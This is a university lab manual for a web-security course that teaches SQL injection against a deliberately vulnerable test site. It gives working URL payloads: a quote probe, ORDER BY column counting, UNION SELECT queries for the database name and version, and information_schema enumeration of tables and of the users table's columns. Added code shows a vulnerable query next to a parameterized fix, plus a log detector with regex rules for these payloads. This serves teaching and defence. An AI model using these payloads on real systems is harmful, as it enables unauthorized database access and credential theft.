Experiment 4

This lab manual describes how to perform an SQL injection attack from a command line URL to demonstrate SQL injection vulnerabilities. It provides steps to gather information like the database name and version by injecting queries. The document shows retrieving table and column names from the database using techniques like concatenation. Successfully extracting column names from the users table indicates the test site is vulnerable to SQL injection attacks.

Uploaded by

Kshitiz Sharma
Copyright
© All Rights Reserved

Lab Manual

Web and Mobile Security (CSP/ITP-338)

Exp No: 4

Aim: Working of SQL injection attack.

Objective: SQL injection attack from the command line (URL).

Software/Hardware Requirements: Windows 7 and above

Tools to be used:

1. SQLMAP
2. Acunetix

Introduction: SQL Injection (SQLi) is a type of injection attack that makes
it possible to execute malicious SQL statements. These statements control a
database server behind a web application. Attackers can use SQL Injection
vulnerabilities to bypass application security measures. They can go around
authentication and authorization of a web page or web application and retrieve
the content of the entire SQL database. They can also use SQL Injection to add,
modify, and delete records in the database.

How and Why Is an SQL Injection Attack Performed

• Attackers can use SQL Injections to find the credentials of other users in
  the database. They can then impersonate these users. The impersonated
  user may be a database administrator with all database privileges.
• SQL lets you select and output data from the database. An SQL Injection
  vulnerability could allow the attacker to gain complete access to all data
  in a database server.
• SQL also lets you alter data in a database and add new data. For example,
  in a financial application, an attacker could use SQL Injection to alter
  balances, void transactions, or transfer money to their account.
• You can use SQL to delete records from a database, even drop tables.
  Even if the administrator makes database backups, deletion of data could
  affect application availability until the database is restored. Also, backups
  may not cover the most recent data.
• In some database servers, you can access the operating system using the
  database server. This may be intentional or accidental. In such a case, an
  attacker could use an SQL Injection as the initial vector and then attack
  the internal network behind a firewall.
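
The mechanism described above, shown next to its fix. This is an added example, not code from the lab manual or from the test site: the handler names, the table layout and the sample rows are constructed, and SQLite stands in for the site's database.

```python
import sqlite3

# A UNION value shaped like the ones in this lab, cut down to two columns.
PAYLOAD = "-1 UNION SELECT 1, uname FROM users"

def make_db():
    """Build a constructed in-memory database (sample data only)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 2);
        INSERT INTO users VALUES ('alice', 'constructed-secret');
    """)
    return db

def list_products_vulnerable(db, cat):
    # Vulnerable: the request value is pasted into the SQL text, so the
    # database parses whatever follows the number as part of the statement.
    sql = "SELECT id, name FROM products WHERE cat = " + cat
    return db.execute(sql).fetchall()

def list_products_safe(db, cat):
    # Hardened: check the type first, then bind the value as a parameter.
    # A bound value is data only; it cannot add a UNION or a comment.
    try:
        cat_id = int(cat)
    except ValueError:
        return []  # not an integer: treat as "no such category"
    sql = "SELECT id, name FROM products WHERE cat = ?"
    return db.execute(sql, (cat_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("1", PAYLOAD):
        print(repr(value))
        print("  vulnerable:", list_products_vulnerable(db, value))
        print("  safe:      ", list_products_safe(db, value))
```

With the concatenated query the second value returns a row from the users table; with the bound parameter it returns nothing.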

Reading Material (add reference links along with material):


https://owasp.org/www-community/attacks/SQL_Injection

Steps/Method/Coding:

• Open the target URL given below in the browser.
• Open the link: http://testphp.vulnweb.com/
• Go to: http://testphp.vulnweb.com/listproducts.php?cat=1
• Inject the malicious code (cheat code): http://testphp.vulnweb.com/listproducts.php?cat=-1'
• Put in a random number with an ORDER BY clause (cheat code) to check the row (tuple): http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11
• Information gathering:
  • To check the database name, go to http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,database()--
  • To check the database version, go to http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,version()--
• Information to be fetched:
  • Table name: cat=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=database()--
  • http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
  • Column name: http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273
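
How the requests in these steps look from the server side: a log check that flags each request shape used above. This is an added example, not part of the lab manual; the rule names, the log lines and the client addresses are constructed, and the log is assumed to be in common log format.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One rule per request shape used in the lab steps above.
RULES = {
    "stray_quote": re.compile(r"=-?\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "db_fingerprint": re.compile(r"\b(?:database|version)\s*\(\s*\)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

# Common log format: client, identity, user, [time], "METHOD target PROTO"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /listproducts.php?cat=-1%27 HTTP/1.1" 200 310
203.0.113.9 - - [01/Jan/2024:10:01:09 +0000] "GET /listproducts.php?cat=-1%20order%20by%2011 HTTP/1.1" 200 310
203.0.113.9 - - [01/Jan/2024:10:01:30 +0000] "GET /listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,version()-- HTTP/1.1" 200 4801
"""

def scan(log_text):
    """Return (client, [rule names]) for each request whose decoded query matches."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        # Decode %20, %27 and '+' first: the patterns are written for plain text.
        query = unquote_plus(urlsplit(target).query)
        matched = sorted(n for n, rx in RULES.items() if rx.search(query))
        if matched:
            hits.append((client, matched))
    return hits

if __name__ == "__main__":
    for client, rules in scan(SAMPLE_LOG):
        print(client, ", ".join(rules))
```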

Output screenshot:

In the given screenshot you can see that we got an error message, which means
the running site is vulnerable to SQL injection.

Maybe we can get some important data from the users table, so let's penetrate
further. Again, use the concat function on the users table to retrieve all of
its column names.

We successfully retrieved all eight column names from inside the users table.

Learning Outcomes:

After completing this exercise, you will be able to detect SQL injection. You
completed the following exercises:

• SQL injection techniques
• Launch a SQL injection attack
• Launch a SQL injection attack from the command line (URL)

• In the above screenshot you can see that we got an error message, which
  means the running site is vulnerable to SQL injection.
• Now use the ORDER BY keyword to sort the records in ascending or
  descending order.
• Use the next query to fetch the name of the database.
• The next query will extract the version of the database system.
• Through the next query, we will try to fetch the table names inside the
  database.
• We successfully retrieved all eight column names from inside the users
  table.

Link for login bypass-

https://infosecwriteups.com/sql-injection-lab-tryhackme-writeup-fcf30f846e82

https://cybersecurityhoy.files.wordpress.com/2021/07/13-sql-injection.pdf
